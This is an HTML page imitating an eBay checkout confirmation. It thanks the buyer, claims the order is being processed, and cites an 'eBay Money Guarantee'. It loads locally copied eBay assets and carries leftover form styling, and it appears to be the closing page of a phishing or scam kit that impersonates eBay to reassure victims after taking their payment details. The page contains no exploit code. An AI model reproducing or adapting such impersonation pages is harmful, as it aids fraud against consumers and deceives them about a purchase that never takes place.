<!DOCTYPE html>
<html lang="en">

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width">
    <meta name="format-detection" content="telephone=no">
    <title>Checkout | eBay</title>
    <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon">
    <link rel="stylesheet" type="text/css" href="css/3sbepdq10q0dtksnrmgitl41cm08e68.css?proc=DU:N">
    <link rel="stylesheet" href="css/desktop-0fa531.css">
    <style>
    #add_row{
         padding: 16px 10px;background: #5ba71b;line-height: 0;
    border: 1px solid #555;border-radius: 2px;color: #fff;font-size: 22px;margin-top: -42px;    position: absolute;
    }
    #add_row:hover{
        text-decoration: none;
        background: #478514;
    }
    ::-webkit-input-placeholder { /* Chrome/Opera/Safari */
        opacity: 0.4;
    }
    ::-moz-placeholder { /* Firefox 19+ */
        opacity: 0.4;
    }
    :-ms-input-placeholder { /* IE 10+ */
        opacity: 0.4;
    }
    :-moz-placeholder { /* Firefox 18- */
        opacity: 0.4;
    }
    #error_container label {
        display: list-item;
        text-align: left;
        padding-top: 5px;
        margin: 0 12px;
        list-style-type: decimal;
    }  
    </style>
</head>

<body class="xo desktop " style="background:#fff">
    <div class="global-header">
        <div class="v-align2col ghCtr">
            <div class="gh-acc-exp-div gh-hide-if-nocss"><a id="gh-hdn-stm" class="gh-acc-a" href="#mainContent">Skip to main content</a></div>
            <!--[if lt IE 9]><div id="gh" role="banner" class="gh-IE8 gh-flex gh-pre-js gh-w gh-minH "><![endif]-->
            <header id="gh" role="banner" class="gh-flex gh-pre-js gh-w gh-minH ">
                <table class="gh-tbl">
                    <tbody>
                        <tr>
                            <td class="gh-td">
                                <!--[if lt IE 9]><a href="https://www.ebay.com/" _sp="m570.l2586" id="gh-la">eBay<img role="presentation" width=117 height=120 style='clip:rect(47px, 118px, 95px, 0px); position:absolute; top:-47px;left:0' alt="" src="images/apstidvcvu5pxlbxkphrrdo5iqv.png" id="gh-logo"></a><![endif]-->
                                <a href="https://www.ebay.com/" _sp="m570.l2586" id="gh-la">eBay<img role="presentation" width="250" height="200" style="clip:rect(47px, 118px, 95px, 0px); position:absolute; top:-47px;left:0" alt src="images/fxxj3ttftm5ltcqnto1o4baovyl.png" id="gh-logo"></a></td>
                        </tr>
                    </tbody>
                </table>
                <!--[if lt IE 9]></div><![endif]-->
            </header>
        </div>
        <div class="v-align2col surveyCtr">
            <div id="survey" data-module-id="4276" class="mb15"><span>How do you like our checkout?</span>
                <br><a id="surveylink" class="survey-link" data-click-id="7743" href="javascript:;" data-url="https://connect.ebay.com/srv/survey/a/cxo.ryp?ctx=uid%3Dbevali-0%26sessionid%3D737570016012%26profile%3DWEB&amp;title=0&amp;close=-1"></a></div>
        </div>
    </div>
    <h1 class="page-title">Confirmation</h1>
        <div id="mainContent">
            <div class="left-section col-xs-12" >
                <div id="alert-page" class="xo-alert skin-large"></div>
                <input type="hidden" id="ddcheckbox">
                <div id="payment-methods-ctr" class="top-lvl-module">
                    <div class="pmt-mthds " style="min-height:400px;">
                        <hr style="background-color: #d9d9d9;height: 1px;border: none !important;">
<h1 style="font-weight:bold; font-size:24px;margin-bottom:0px;">Thank you for your purchase!</h1>
<p style="margin: 5px 0;">Your order is being processed, we will email you within the next 12 hours for confirmation.</p>
                        <hr style="background-color: #d9d9d9;height: 1px;border: none !important; margin:40px 0;">
                        <table>
                        
                        <tr>
                            <td><img src="images/protection.png"/></td>  
                            <td colspan="2">Your order is covered by eBay Money Guarantee. Learn More.</td> 
                        </tr>
                        </table>
 <hr style="background-color: #d9d9d9;height: 1px;border: none !important; margin:20px 0;">

<p>What do you want to do next?</p>
                        <table>
                                                <tr>
                            <td><img src="images/home.png"/></td>  
                            <td><a href="https://www.ebay.com/">Go to eBay's Homepage</a><br><span  style="font-size: 12px;color: #777;">to continue shopping and discover great details..</span></td> 
                        
                        </table>
                         <hr style="background-color: #d9d9d9;height: 1px;border: none !important; margin:60px 0 20px;">
                    </div>
                </div>

            </div>
        </div>
 
    <footer id="glbfooter" role="contentinfo" class="gh-w gh-flex">
        <!--<![endif]-->
        <div>
            <div id=rtm_html_1650></div>
            <div id=rtm_html_1651></div>
        </div>
        <h2 class=gh-ar-hdn>Additional site navigation</h2>
        <div id="gf-t-box">
            <table class="gf-t">
                <tr valign="top">
                    <td class="gf-legal">Copyright © 1995-2020 eBay Inc. All Rights Reserved. <a href="https://pages.ebay.com/help/policies/user-agreement.html">User Agreement</a>, <a href="https://pages.ebay.com/help/policies/privacy-policy.html">Privacy</a>, <a href="https://pages.ebay.com/help/account/cookies-web-beacons.html">Cookies</a> and <a href="https://cgi6.ebay.com/ws/eBayISAPI.dll?AdChoiceLandingPage&amp;partner=0" id=gf-AdChoice>AdChoice</a></td>
                    <td nowrap align=center><a title="Verify site's SSL certificate" _exsp="m571.l3943" href="https://trustsealinfo.websecurity.norton.com/splash?form_file=fdf/splash.fdf&amp;dn=www.ebay.com&amp;lang=en" onclick="this.href='https://trustsealinfo.websecurity.norton.com/splash?form_file=fdf/splash.fdf&amp;dn=#D#&amp;lang=en'.replace(/#D#/,location.host);return true" rel="noreferrer"><i id=gf-norton>Norton Secured - powered by Verisign</i></a></td>
                </tr>
            </table>
        </div>
    </footer>
</body>
</html>